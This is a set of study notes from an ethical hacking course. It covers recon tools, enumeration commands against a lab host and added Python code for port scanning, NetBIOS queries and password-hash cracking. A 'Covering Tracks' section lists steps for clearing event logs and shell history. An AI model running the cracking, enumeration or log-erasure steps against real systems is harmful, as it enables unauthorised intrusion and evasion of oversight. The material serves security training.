Ethical Hacking : Notes


Disclaimer:

  • This document contains unedited notes and has not been formally proofread.
  • The information provided in this document is intended to provide a basic understanding of certain technologies.
  • Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
  • Some websites and software may be flagged as malware by antivirus programs.
  • The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
  • The document is not a substitute for professional advice or expert analysis and should not be used as such.
  • The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
  • The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
  • The author disclaims any liability for any damages or losses that may result from the use of this document or the information contained therein.
  • The author reserves the right to update or change the information contained in this document at any time without prior notice.

  • Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
  • It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
  • Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
  • It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
  • It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
  • It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.

Reference : https://www.linkedin.com/learning/

Contents

Chapter 1: Introduction to Ethical Hacking, by Lisa Bock
Chapter 2: Ethical Hacking: Footprinting and Reconnaissance, by Lisa Bock
Chapter 3: Ethical Hacking: Scanning Networks, by Lisa Bock
Chapter 4: Ethical Hacking: Enumeration, by Malcolm Shore
Chapter 5: Ethical Hacking: Vulnerability Analysis, by Lisa Bock
Chapter 6: Ethical Hacking: System Hacking, by Lisa Bock
Chapter 7: Ethical Hacking: The Complete Malware Analysis Process, by Malcolm Shore
Chapter 8: Ethical Hacking: Sniffers, by Lisa Bock
Chapter 9: Ethical Hacking: Social Engineering, by Lisa Bock
Chapter 10: Ethical Hacking: Denial of Service, by Malcolm Shore
Chapter 11: Ethical Hacking: Session Hijacking, by Malcolm Shore
Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots, by Malcolm Shore
Chapter 13: Ethical Hacking: Hacking Web Servers and Web Applications, by Malcolm Shore
Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore
Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore
Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari
Chapter 17: Ethical Hacking: Cryptography, by Stephanie Domas
Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance
Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore

***********************************************************************************************************

Technology: Security

Become an Ethical Hacker

Ethical hacking is the ability to identify vulnerabilities in an organization's network or infrastructure, and then address the issues to prevent incidents or attacks. Learn how to perform penetration testing and gain the knowledge and skills you need for a career in information security.



Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock

** Attack types

1. Passive (observe without altering the target)

- Sniffing

- Port scanning (scanning does send probes to the target, so many references class it as active reconnaissance)

2. Active (change the target's state)

- Releasing malware

- Launching a DDoS


** Standards:

- PCI DSS

- HIPAA

- SOX

- GDPR

- COBIT framework

** Burst attack: a short, high-intensity DoS

Reconnaissance - the attacker gathers information about you (the target) before attacking.


Three basic control types an organization uses to contain a cyber attack

1. Technical controls - detect and protect

2. Administrative controls - policies and procedures

3. People - awareness and training


VLANs

NAT - Network Address Translation

Spam filters, packet shapers and honeypots


TOGAF - The Open Group Architecture Framework

ITIL - Information Technology Infrastructure Library

COBIT - Control Objectives for Information and Related Technology


SOX - Sarbanes-Oxley Act

SOX sections 301 & 404 indirectly deal with information assurance and data integrity


Penetration testing: can include network devices, email, hosts, wireless, applications, and websites.


FISMA - Federal Information Security Management Act


Vulnerability scanning tool

1. Tenable (Nessus)


Ethical Hacking

Means -

- working out what an attacker could derive from the information that is exposed

- planning countermeasures from that analysis


Planned five-phase approach

- Reconnaissance

- Scanning

- Gaining access

- Maintaining access

- Covering Tracks

******************************************************************************


Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock


Finding Information everywhere:-

Public resources - Websites, directories, email, job sites, Social websites.



Google Hacking database:

https://www.exploit-db.com/google-hacking-database


HTTrack Website Copier

https://www.httrack.com/


Montastic: website uptime monitoring, free for open-source projects

https://www.montastic.com/


StatusOK

Monitor your Website and APIs from your computer. Get notified through Slack or E-mail when your server is down or response time is more than expected.

https://github.com/sanathp/statusok


https://www.shodan.io/

Shodan is the world's first search engine for Internet-connected devices.


Email Header look up

https://mxtoolbox.com/


 Metagoofil is an information gathering tool designed for extracting metadata of public documents

https://www.kali.org/tools/metagoofil/


FOCA (Fingerprinting Organizations with Collected Archives)

https://github.com/ElevenPaths/FOCA


theHarvester : Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet.

https://github.com/laramies/theHarvester

https://www.kali.org/tools/theharvester/


DMARC, which stands for “Domain-based Message Authentication, Reporting & Conformance”, is an email authentication, policy, and reporting protocol.

https://dmarc.org/


The Anti Hacker Alliance™ fights against Hackers

https://anti-hacker-alliance.com/


tracert google.com

pathping google.com

(Windows commands; on Linux use traceroute and mtr)


Network Tools: free online network utilities (ping, traceroute, DNS and WHOIS lookups)

https://network-tools.com/


dig Command in Linux

https://www.geeksforgeeks.org/dig-command-in-linux-with-examples/


https://toolbox.googleapps.com/apps/main/


https://dnsdumpster.com/

https://who.is/


IP logger: a tracking URL that records the IP address and approximate geolocation of whoever opens it

https://iplogger.org/


******************************************************************************

Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock


Well-known ports 0 - 1023

21 FTP

22 SSH

53 DNS (Domain Name System)

80 HTTP

88 Kerberos


Ports from 1024-49151 are registered

3389 - Remote desktop Protocol (RDP)


Vulnerability Scan


Port states reported by a scanner (and what a firewall does to them):

open - a service is listening; the host answers the probe (SYN/ACK for TCP)

closed - the port is reachable but nothing is listening; the host answers with RST

filtered (no reply) - a firewall silently drops the probe; sometimes called "stealth" mode


Tools in Kali Linux:

Netcat and Nmap

DMitry

Curl

Armitage

Banner grabbing: connecting to a service and reading what it announces about itself, to learn

the operating system

open ports and the service/version running on them

To prevent banner grabbing:

mask or change the web server's banner (Server header) rather than exposing the real product and version

hide file extensions on services (they reveal the back-end technology)

disable unnecessary services
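Added example (Python), not from the course or these notes: a TCP connect scan that classifies a port as open, closed or filtered the way the notes above describe, and grabs the banner from an open one. So that it runs offline, it starts its own throw-away service on 127.0.0.1 that sends a constructed banner (the OpenSSH-style string is made up for the demo); the classification logic is the same one you would point at a real host.

```python
"""TCP connect scan with banner grabbing against a local test service (added example)."""
import socket
import threading


def start_banner_service(banner: bytes) -> int:
    """Constructed stand-in for a real daemon: listens on 127.0.0.1, sends a banner, closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0 = let the OS pick a free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def probe(host: str, port: int, timeout: float = 1.0) -> tuple:
    """Classify a port the way a connect scan does and return (state, banner).
    open     - handshake completed; we then read whatever the service says first
    closed   - host answered with RST (ConnectionRefusedError)
    filtered - no answer before the timeout, typical of a firewall dropping packets"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        s.close()
        return ("closed", b"")
    except OSError:                      # includes socket.timeout and "host unreachable"
        s.close()
        return ("filtered", b"")
    try:
        banner = s.recv(1024)            # SSH, FTP and SMTP all speak first
    except OSError:
        banner = b""
    finally:
        s.close()
    return ("open", banner)


def find_closed_port() -> int:
    """Pick a port nothing listens on by binding it and releasing it straight away."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    open_port = start_banner_service(b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n")   # constructed banner
    for p in (open_port, find_closed_port()):
        state, banner = probe("127.0.0.1", p)
        print(f"127.0.0.1:{p} {state} {banner.decode(errors='replace').strip()}")
```

Against a firewall that drops rather than rejects, every probe ends in the "filtered" branch after the timeout, which is why scans of stealth-mode hosts take so much longer than scans of hosts that answer with RST.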


SSDP: Simple Service Discovery Protocol


https://www.spiceworks.com/free-network-monitoring-management-software/


NetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.

https://www.netresec.com/?page=NetworkMiner


FING App : https://www.fing.com/products/fing-app

Net Scan by Nick Circelli

IP Tools: WiFi Analyzer by AmazingByte


Nikto :

Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems.

https://www.kali.org/tools/nikto/


Staying anonymous:

1. Use private browsing

2. Privacy Badger (tracker-blocking browser extension)

3. Use a password manager

4. Use DuckDuckGo

5. Use a VPN

6. Use a temporary email address

Staying anonymous on mobile

1. Don't use a phone

2. Don't use Google

3. Disable GPS

4. Use Waze


Onion routing (Tor)

1. Don't torrent over Tor

2. Don't install or enable browser plugins

3. Use only HTTPS

4. Don't open downloaded documents while online


TOR flow network

https://torflow.uncharted.software/


Proxy chain tools:

1. Proxy Switcher

2. Proxifier

3. Proxy Workbench


Kali Linux:

sudo apt-get install tor


sudo apt-get install proxychains


SSH tunnels:

https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

https://www.putty.org/

***************************************************************************

Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore


Enumeration is Identifying -

1. Username

2. System addresses

3. Network resources

4. Shares

5. Other targets


Before vulnerability testing

- Extract usernames

- Gather host information via null sessions (anonymous SMB/NetBIOS connections)

- Port enumeration

- User account enumeration

- Special protocol enumeration (e.g., SNMP, LDAP)


Approaches

- Local host enumeration

- remote host enumeration

- internet enumeration

- port and services enumeration


Useful service

Port 53 - DNS Domain Name System

Port 25 - SMTP Simple Mail Transfer Protocol

Port 135 - RPC Remote Procedure Call (endpoint mapper)

Port 139 - NetBIOS session service

Port 161 - SNMP Simple Network Management Protocol

Port 389 - LDAP Lightweight Directory Access Protocol

Port 445 - SMB Server Message Block






┌──(kali㉿kali)-[~]

└─$ echo $UID


┌──(kali㉿kali)-[~]

└─$ cat /etc/passwd |more


┌──(kali㉿kali)-[~]

└─$ sudo cat /etc/sudoers


┌──(kali㉿kali)-[~]

└─$ getent group sudo


How to get a root shell from a user shell

┌──(kali㉿kali)-[~]

└─$ sudo su

┌──(root㉿kali)-[/home/kali]

└─# echo $UID

0

┌──(root㉿kali)-[/home/kali]

└─# exit

┌──(kali㉿kali)-[~]

└─$


NetBIOS

  • NetBIOS name service - port 137 UDP

  • Datagram Distribution service - PORT 138 UDP

  • NetBIOS over TCP/IP - PORT 139 TCP

SMB

  • Samba is the open-source Unix/Linux implementation of SMB

DCE Distributed Computing Environment

  • RPC Remote Procedure Call

Local-Host Enumeration: 

Profiling a Linux host (Metasploitable 2)


$ cat /proc/version 

$ cat /etc/*-release

$ cat /proc/cpuinfo

$ df -a

$ df -h

$ cat /etc/shells


List of user names

  • $ cat /etc/passwd


Password with Hash 

  • $ sudo cat /etc/shadow


$ pinky

$ w

$ who -a
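Added example (Python), not from the course or these notes: what a tester actually does with the output of cat /etc/passwd during local-host enumeration. The sample passwd content is constructed (the account names are made up, loosely modelled on a Metasploitable box); on a real host read the file instead of the string. It lists the accounts with an interactive shell (the ones worth password guessing), any UID 0 account other than root (a classic backdoor), and UIDs shared by several names.

```python
"""Local-host user enumeration from /etc/passwd content (added example)."""

# Constructed sample in /etc/passwd format; on a real host use open("/etc/passwd").read().
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
toor:x:0:0::/root:/bin/sh
service:x:1002:1002:,,,:/home/service:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text: str) -> list:
    """Return one dict per account: name, uid, gid, gecos, home, shell."""
    accounts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue                      # malformed line: skip rather than crash
        name, _pw, uid, gid, gecos, home, shell = fields
        accounts.append({"name": name, "uid": int(uid), "gid": int(gid),
                         "gecos": gecos, "home": home, "shell": shell})
    return accounts


def interactive_users(accounts: list) -> list:
    """Accounts with a real login shell: the ones worth password guessing or su'ing to."""
    return [a["name"] for a in accounts if a["shell"] not in NOLOGIN_SHELLS]


def extra_uid0(accounts: list) -> list:
    """Any UID 0 account other than root is a classic backdoor indicator."""
    return [a["name"] for a in accounts if a["uid"] == 0 and a["name"] != "root"]


def duplicate_uids(accounts: list) -> dict:
    """UIDs shared by several names; the kernel cannot tell such accounts apart."""
    seen = {}
    for a in accounts:
        seen.setdefault(a["uid"], []).append(a["name"])
    return {uid: names for uid, names in seen.items() if len(names) > 1}


if __name__ == "__main__":
    accts = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", interactive_users(accts))
    print("extra uid 0:", extra_uid0(accts))
    print("shared uids:", duplicate_uids(accts))
```

The hashes themselves are in /etc/shadow (root only); /etc/passwd is world-readable, so this enumeration works from any unprivileged shell.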



Profiling a windows Host

Download PsTools:-  https://docs.microsoft.com/en-us/sysinternals/downloads/pstools


Windows Terminal


Downloads> cd .\PSTools\

Downloads\PSTools> .\PsInfo.exe

Downloads\PSTools> .\PsInfo.exe -d

Downloads\PSTools> .\PsInfo.exe -s

Downloads\PSTools> .\pslist.exe

Downloads\PSTools> .\pslist.exe -t

Downloads\PSTools> .\pslist.exe -x

Downloads\PSTools> .\psloglist.exe -n 10

Downloads\PSTools> .\PsLoggedon.exe

Downloads\PSTools> .\PsService.exe

Downloads\PSTools> .\PsService.exe security Eventsystem

Downloads\PSTools> .\PsService.exe depend Eventsystem



Kali Linux :- 

Getting details from metasploitable-2 


smbmap -u '' -p '' -H 10.0.2.4 -R


sudo netstat -i 


Scan UDP ports only (needs root)

sudo nmap -sU 10.0.2.4


Scan TCP ports only (the default scan type; -sS is the SYN scan and needs root, -sT is the unprivileged connect scan)

nmap -sT 10.0.2.4

(nmap -PS 10.0.2.4 only changes the host-discovery probe to a TCP SYN "ping"; the port scan that follows is still the default TCP scan)


SMB from Linux:-

nbtscan

┌──(kali㉿kali)-[~]

└─$ nbtscan -h


┌──(kali㉿kali)-[~]

└─$ sudo nbtscan -v -s : 10.0.2.0/24 


─$ sudo nbtscan -rv 10.0.2.0/24
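Added example (Python), not from the course or these notes: the bytes nbtscan puts on the wire. It implements the NetBIOS first-level name encoding from RFC 1001 (pad the name to 15 bytes, append the suffix byte, then turn each byte into two letters from 'A' to 'P') and builds the NBSTAT node-status query that asks a host on UDP 137 for its name table. The transaction ID 0x1337 and the name "KALI" are arbitrary values chosen for the demo.

```python
"""NetBIOS name encoding and an NBSTAT query, the bytes behind nbtscan (added example)."""
import struct


def encode_netbios_name(name: str, suffix: int = 0x00, pad: bytes = b" ") -> bytes:
    """First-level encoding (RFC 1001 section 14.1): pad the name to 15 bytes, append the
    suffix byte (0x00 workstation, 0x20 file server, ...), then split every byte into two
    nibbles and add each to 'A' (0x41). 16 bytes become a 32-letter label."""
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def decode_netbios_name(encoded: bytes) -> tuple:
    """Reverse of encode_netbios_name: returns (name, suffix)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].rstrip(b" \x00").decode("ascii"), raw[15]


def build_nbstat_query(txid: int = 0x1337) -> bytes:
    """NBSTAT (node status) request for the wildcard name '*', sent to UDP port 137.
    Header: ID, flags 0 (unicast query), QDCOUNT 1, other counts 0.
    Question: length-prefixed encoded name, NUL, QTYPE 0x0021 (NBSTAT), QCLASS 1 (IN)."""
    # The wildcard name is '*' padded with NULs (not spaces); it encodes to the well-known
    # "CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" label seen in every nbtstat -A capture.
    qname = b"\x20" + encode_netbios_name("*", suffix=0x00, pad=b"\x00") + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + qname + struct.pack("!HH", 0x0021, 0x0001)


if __name__ == "__main__":
    print(encode_netbios_name("KALI", 0x20).decode())
    print(decode_netbios_name(encode_netbios_name("KALI", 0x20)))
    print(build_nbstat_query().hex())
```

To use it live you would sock.sendto(build_nbstat_query(), (target_ip, 137)); the reply carries the host's name table, each entry with its suffix byte, which is how nbtscan knows whether an entry is a workstation, a domain or a file server.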


nmap

┌──(kali㉿kali)-[~]

└─$ ls /usr/share/nmap/scripts 



┌──(kali㉿kali)-[~]

└─$ sudo nmap --script smb-os-discovery 10.0.2.4


┌──(kali㉿kali)-[~]

└─$ sudo nmap --script smb-enum-users 10.0.2.4


enum4linux

┌──(kali㉿kali)-[~]

└─$ enum4linux -U 10.0.2.4


┌──(kali㉿kali)-[~]

└─$ enum4linux -S 10.0.2.4

         

rpcclient                                                                                                         

┌──(kali㉿kali)-[~]

└─$ rpcclient -h



https://www.mitec.cz/netscan.html


https://www.softperfect.com/products/networkscanner/


https://www.ireasoning.com/mibbrowser.shtml


WMI

Understanding how to enumerate WMI is useful both for offensive and defensive activities.


whatweb

┌──(kali㉿kali)-[~]

└─$ whatweb 10.0.2.4


┌──(kali㉿kali)-[~]

└─$ whatweb 10.0.2.0/24 --no-errors | grep -v Unassigned

nikto

┌──(kali㉿kali)-[~]

└─$ nikto -h 10.0.2.4   


zaproxy

sudo apt install zaproxy


https://www.kali.org/tools/zaproxy/

gobuster

https://www.kali.org/tools/gobuster/


Tracing Routes 

┌──(kali㉿kali)-[~]

└─$ sudo traceroute -I 67.3.11.1  



Cloud enumeration

AWS has its own CLI (command-line interface), the aws tool, for listing accounts, roles and resources


NetScanTools Basic Edition

https://www.netscantools.com/nstbasicmain.html


LDAP 

https://sourceforge.net/projects/ldapadmin/


Telnet

┌──(kali㉿kali)-[~]

└─$ telnet 10.0.2.4



***********************************************************************************************************

Chapter 5 :Ethical Hacking: Vulnerability Analysis -By: Lisa Bock


Managing Org Risk: 


Risk = Threats * Vulnerabilities 


Zero-Day Attack

Vulnerability found in the wild -> neither the public nor the vendor is aware

Vendor becomes aware (the zero-day window) -> public still unaware, no patch yet

Vendor releases a patch -> public aware; systems that have not applied the patch remain exposed


Assessing Vulnerabilities

  • Network scanning

  • 2 types

    • Information systems = DBMS, software

    • Information technologies = hardware, network devices

  • How to run a vulnerability scan

    • Unauthenticated scan = no username/password; sees only what an outsider sees; basic configuration; can miss many vulnerabilities

    • Authenticated scan = valid username/password (often run against a clone of the environment); detailed results, including missing patches and local misconfigurations

Lifecycle for Vuln management

  • Baseline

  • Assess Vuln = Plan (compliance req.; Tools- Ports cans, n/w scans, web app scans.)

  • Assess Risk

  • Remediate = Mitigate the vuln. 

  • Verify = retest 

  • Monitor = continuous monitoring 

Threat Modeling

Builds a model of the entire system together with its entry points and a list of the attacks possible against each one


Data Breach : 

https://informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/#bysensitivity

Example threat model (from the SAFECode whitepaper): a web-based user feedback system

https://safecode.org/wp-content/uploads/2017/05/SAFECode_TM_Whitepaper.pdf


Using STRIDE (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege), the whitepaper lists the threats possible against this system, organized by class of threat.


Analyzing Vulnerabilities 


NIST SP 800-30, Page 78

https://www.nist.gov/privacy-framework/nist-sp-800-30


NIST: Common Vulnerability Scoring System Calculator [CVSS]

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator


CVE: Common Vulnerabilities and Exposures

Each CVE has an ID (CVE-YYYY-NNNNN); its severity score is derived from the CVSS metrics (base, temporal, environmental)


Current CVSS Score Distribution For All Vulnerabilities

https://www.cvedetails.com/

https://www.cvedetails.com/vulnerability-list.php?vendor_id=0&product_id=0&version_id=0&page=22&hasexp=0&opdos=0&opec=1&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=2022&cweid=0&order=2&trc=2105&sha=3ecb9c2942e59ed03bfff2cd27fb2aa98519a183


Learn Vulnerability scan from Web


https://www.hacker101.com/start-here


https://ctf.hacker101.com/auth/login


https://www.hackerone.com/


Virtual Machine Image : 

https://www.osboxes.org/


Kali linux


Commando VM: 

https://www.mandiant.com/resources/commando-vm-windows-offensive-distribution


Github link:-

https://github.com/mandiant/commando-vm


Nikto : Built into Kali linux

┌──(kali㉿kali)-[~]

└─$ nslookup scanme.nmap.org


┌──(kali㉿kali)-[~]

└─$ nikto -h 45.33.32.156  

Fuzz Testing

A black-box method that feeds a system large volumes of malformed or random input to find crashes and unhandled cases


Kali linux - OWASP ZAP

LAN

Defending the LAN

Spoofing:

Man In The Middle Attack

ARP spoofing 

MAC spoofing 

Cisco Discovery Protocol Attack

VLAN hopping attack

DHCP attack

Yersinia attack Tool: 

https://www.kali.org/tools/yersinia/


┌──(kali㉿kali)-[~]

└─$ sudo yersinia -G


Attacks can be launched from yersinia. 


Monitoring Tools: 


https://www.nagios.org/

https://www.tenable.com/products/nessus

https://www.gfi.com/


https://sectools.org/


Firewalls and HIDS

Endpoint firewall examples - ZoneAlarm, ESET, and Norton Personal Firewall

Host intrusion detection:

A HIDS must first learn the host's normal behaviour (its baseline); it then monitors the host for suspicious activity

Examples - Symantec Endpoint Protection, McAfee Host Intrusion Prevention, Suricata (network-based IDS/IPS)


https://help.eset.com/eis/15/en-US/


Hack a website Exercise:- 

https://hbh.sh/home

***********************************************************************************************************

Chapter 6: Ethical Hacking: System Hacking,  By: Lisa Bock

APT Advanced persistent Threat

NTLM New Technology LAN Manager

Kerberos

PAM Pluggable Authentication Modules

SASL Simple Authentication and Security Layer


Gaining Access:- 

SAM Security Account Manager 


Random password generator:

https://www.passwordrandom.com/

Dictionary Attack

Brute Force Attack

Hybrid Attack

Password cracking Tools:

 L0phtCrack 7.2.0 has been released as an open source project

https://gitlab.com/l0phtcrack/l0phtcrack/-/releases


Ophcrack is a free Windows password cracker based on rainbow tables. 

https://ophcrack.sourceforge.io/



John the Ripper

Cain and Abel


Passwords are stored as hashes; Secure Hash Algorithms (the SHA family) are among the hash functions used, alongside older ones such as MD5 and NTLM


Rainbow crack:-

http://project-rainbowcrack.com/


Compute the hash of a password in various formats

https://www.fileformat.info/tool/hash.htm


Online Reverse Hash Lookup

http://reverse-hash-lookup.online-domain-tools.com/


http://www.md5.cz/
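Added example (Python), not from the course or these notes: the three cracking strategies listed above (dictionary, hybrid, brute force) run against unsalted hashes, which is the situation rainbow tables and the reverse-hash lookup sites also rely on. The six-word wordlist and the target passwords are constructed; a real run uses a list such as rockyou.txt. The mangling rules in mangle() are a small, made-up subset of what John the Ripper's rule engine does.

```python
"""Dictionary, hybrid and (small) brute-force cracking of unsalted hashes (added example)."""
import hashlib
import itertools
import string

# Constructed wordlist; a real run uses rockyou.txt or similar.
WORDLIST = ["password", "letmein", "winter", "summer", "admin", "welcome"]


def hash_password(pw: str, algo: str = "sha256") -> str:
    """Unsalted hash as stored by weak schemes (md5, sha1, sha256 all work with hashlib)."""
    return hashlib.new(algo, pw.encode()).hexdigest()


def dictionary_attack(target: str, algo: str, words=WORDLIST):
    """Try each word exactly as written."""
    for w in words:
        if hash_password(w, algo) == target:
            return w
    return None


def mangle(word: str):
    """Hybrid rules (made-up subset of a JtR rule set): case variants plus common suffixes."""
    bases = (word, word.capitalize(), word.upper())
    suffixes = [""] + [str(n) for n in range(10)] + ["!", "123", "2022", "2023"]
    for b in bases:
        for s in suffixes:
            yield b + s


def hybrid_attack(target: str, algo: str, words=WORDLIST):
    """Dictionary words run through the mangling rules."""
    for w in words:
        for cand in mangle(w):
            if hash_password(cand, algo) == target:
                return cand
    return None


def brute_force(target: str, algo: str, charset=string.ascii_lowercase, max_len=4):
    """Exhaustive search. Cost is sum of len(charset)**n for n up to max_len, which is why
    this only works for short passwords, fast hashes, or both."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            cand = "".join(combo)
            if hash_password(cand, algo) == target:
                return cand
    return None


if __name__ == "__main__":
    target = hash_password("Winter2023")          # constructed victim password
    print("dictionary:", dictionary_attack(target, "sha256"))
    print("hybrid:    ", hybrid_attack(target, "sha256"))
    print("brute:     ", brute_force(hash_password("abc"), "sha256"))
```

All three fail against a properly stored password: a per-user salt makes precomputed tables and the online lookup sites useless, and a slow hash (bcrypt, scrypt, Argon2) turns the millions of guesses per second here into a few thousand.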

Escalating Privileges

  • Horizontal - access as another user at the same privilege level

  • Vertical - access at a higher privilege level (user to administrator/root)

Privilege escalation takes advantage of a vulnerability or misconfiguration to gain administrator access.

 

Password Resetting Tool:

https://trinityhome.org/


https://www.password-changer.com/index.html



simda bot free ip scanner

https://checkip.kaspersky.com/


Recognizing Spyware

Categories of Malware

  • Spyware

  • Viruses

  • Worms

  • Trojans

  • Rootkits

  • Adware

Block Third party cookies always


Anti Spyware Tools: 

Spybot Identity Monitor is a simple program to monitor email addresses and usernames against the Have I Been Pwned database of leaked account information.

https://www.safer-networking.org/products/spybot-identity-monitor/


https://www.safer-networking.org/free-download/


Keyloggers: 

https://www.elitekeyloggers.com/


Help Your Kids by Watching Their Back

https://www.refog.com/

Objective-see: 

 non-profit foundation, creating free open-source macOS security tools, books, and the #OBTS conference

https://objective-see.org/

malwarebytes

https://www.malwarebytes.com/keylogger


Hiding in Plain Sight

Creating Hidden content 

desktop> notepad temp.txt:secret.txt


To display hidden content:- 

desktop>more < temp.txt:secret.txt


Steganography Tools: these are obsolete 

  • MP3Stego

  • S-Tools

  • OpenPuff


Enable auditing in Windows Local Security Policy

Local Policies -> Audit Policy -> Audit account logon events -> enable (success and failure)


Covering Tracks:
  • Metasploit meterpreter > clearev (clears the Application, System and Security event logs on a Windows target)

  • Linux log files are stored in the /var/log directory

    • In BackTrack: kwrite /var/log/messages

  • Erase command history

    • export HISTSIZE=0 (bash keeps no history for that session)

  • Windows: open Event Viewer and select Clear Log


***********************************************************************************************************

Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore


Introduction to Malware

Improve the Windows startup: in Regedit, delete unwanted autostart entries under the following keys (the same keys malware uses for persistence)

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run

Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs




ROOTKIT

Zeus malware:

Zeus, also known as Zbot, is a kind of malware, referred to as a trojan, which can secretly install itself on your device.

  • Citadel (malware)

Virus Construction Kit

2 types 

  • GUI interface

  • Configuration file


SpyEye Builder 

FireCrypt 

Trojan Development Kit - TDK


Reference: Transcriptase–Light: A Polymorphic Virus Construction Kit

https://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1513&context=etd_projects


MITRE ATT&CK

is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.

https://attack.mitre.org/


Malware Detection

IOC Indicator of Compromise

IOA Indicator of Attack


IOC Bucket

is a free community-driven platform dedicated to providing the security community a way to share quality threat intelligence in a simple but efficient way.


OASIS OPEN:

https://www.oasis-open.org/


ADS Anomaly Detection System 

Sandboxing Malware

Some enterprise products as examples 

https://www.sonicwall.com/products/firewalls/



Malware That changes

  • Polymorphic

  • Metamorphic

Ransomware
WannaCry
  • Delivery via phishing; then spread on its own through SMBv1 on port 445 (the file-sharing port) using the EternalBlue exploit

APT Defenses: advanced persistent threat 

Targeted cyberattacks logbook (Kaspersky)

Click on each malware entry to get more information

SODIN malware:

Exploits using CVE-2019-2725/9

Dropper installs w32.sodin malware

Privilege escalation using CVE-2018-8453 & gains full system privileges

BlackEnergy 2 & 3: malware that attacks industrial control workstations

Encrypted rootkit payload

GreyEnergy Malware

Reverse Engineering Malware



https://zeltser.com/mastering-4-stages-of-malware-analysis/


https://cuckoosandbox.org/


VirusShare.com is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code


https://virusshare.com/about

malware-traffic-analysis

A source for packet capture (pcap) files and malware samples

https://www.malware-traffic-analysis.net/




Automated Malware analysis
Hybrid Analysis 

This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. 


